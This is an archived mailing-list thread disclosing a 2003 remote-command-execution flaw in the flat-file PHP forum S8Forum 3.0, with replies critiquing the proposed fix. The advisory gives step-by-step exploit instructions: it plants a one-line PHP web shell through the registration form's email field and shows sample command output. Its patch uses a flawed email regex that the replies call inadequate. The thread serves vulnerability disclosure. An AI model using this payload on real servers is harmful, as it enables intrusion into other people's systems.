PDA

Bekijk Volledige Versie : A security vulnerability in S8Forum



nmsh_sa@canada.com
07/01/03, 02:42
INFORMATIONS :
=============

- Product : S8Forum
- Tested version : 3.0 maybe other versions.
- Website : http://www.kellishaver.com/
Vendor Status: not informed yet !!!
- Problem : A security vulnerability in S8Forum

PROBLEM :
=========

This forum writen by PHP. It doesn't use database,
instead that it creates new file with the name of the
registered user then save it in (users) directory
without extention.

The programm doesn't check user's intries, like user
name, email..etc!. This bug able us to run some
commands on the server!.

EXPLOIT :
=========

- go to Register

- insert in Username:
any_name.php
NOTE: .php :)

- in password : any_pasword.

- in E-Mail:

<? system($cmd); ?>

or any code :(

- now go to this URL:

http://sitename/s8forumfolder/users/any_name.php?cmd=uname%20-a

------ out ---

evil.php:c4ca4238a0b923820dcc509a6f75849b Linux
xxx.xxx.net 2.4.18 #2 SMP Mon Nov 18 16:50:02 CST 2002
i686 unknown

------ out ---



SOLUTION :
==========

open register.php

- step1 find this lines:


case 'registration_confirm':
// what to do with the form data

include("settings/header.php");


- The next step add below:


if(!eregi("^[_a-z0-9-]+(\.[_a-z0-9-]+)*@[a-z0-9-]+(\.[a-z0-9-]+)*(\.[a-z]{2,3})$", $email) && $email !=
"") {
echo "<p><font size=\"4\" color=\"#FF0000\">Please
enter a valid email address. Press the back button and
correct it.</font></p>";

}
if(strstr($uname, "."))
echo "<p><font size=\"4\" color=\"#FF0000\">Please
enter a valid username. Press the back button and
correct it.</font></p>";
break;



NOTE :
======
S8Forum author has been notified on Sun 17/11 2002.
Another mail was sent on 22/12 2002. No answer so far,
no new release, no patch to fix these issues.



PROVIDED BY :
=============
Nasser.M.Sh
nmsh_sa@yahoo.com

__________________________________________________ ________
Get your FREE personalized e-mail at http://www.canada.com

David Wilson
15/01/03, 22:33
On Tue, 2003-01-07 at 03:20, Steve Watt wrote:
> In article <20030105032650.16087.h011.c009.wm@mail.canada.com. criticalpath.net> you write:
> [ snip ]
> >SOLUTION :
> >==========
> [ snip ]
> > if(!eregi("^[_a-z0-9-]+(\.[_a-z0-9-]+)*@[a-z0-9-]+(\.[a-z0-9-]+)*(\.[a-z]{2,3})$",
> >$email) && $email !=
> >"") {
>
> Please note that there are many more characters valid in the LHS of an
> email address, for example +, that are often desirable. Disallowing
> such addresses is a major nuisance.

Indeed.

In fact, ANY ASCII character can appear in the local-part of the
address, because the local part can be a quoted-string and a
quoted-string can contain any virtually any ASCII.

Then, the domain can be a domain-literal, and this can contain CFWS,
which can contain comments. Comments cannot be recognised by a regular
expression as comments nest.

RFC 2822 address validation requires knowlege of that standard.

David Wilson
Isode Limited

Steve Watt
21/01/03, 05:48
In article <20030105032650.16087.h011.c009.wm@mail.canada.com. criticalpath.net> you write:
[ snip ]
>SOLUTION :
>==========
[ snip ]
> if(!eregi("^[_a-z0-9-]+(\.[_a-z0-9-]+)*@[a-z0-9-]+(\.[a-z0-9-]+)*(\.[a-z]{2,3})$",
>$email) && $email !=
>"") {

Please note that there are many more characters valid in the LHS of an
email address, for example +, that are often desirable. Disallowing
such addresses is a major nuisance. A beautiful example is the useful
feature in sendmail that allows user+whatever@dom.ain, which allows
users to invent infinite variations on their email address for tracking
spam database propagation.

In this particular application, the error is more widespread than the
fix you cite -- if you're going to allow random users to control file
names on your system, you certainly shouldn't put the contents somewhere
that a web server can directly find it.

That bit of software seems to need a major review.

--
Steve Watt KD6GGD PP-ASEL-IA ICBM: 121W 56' 57.8" / 37N 20' 14.9"
Internet: steve @ Watt.COM Whois: SW32
Free time? There's no such thing. It just comes in varying prices...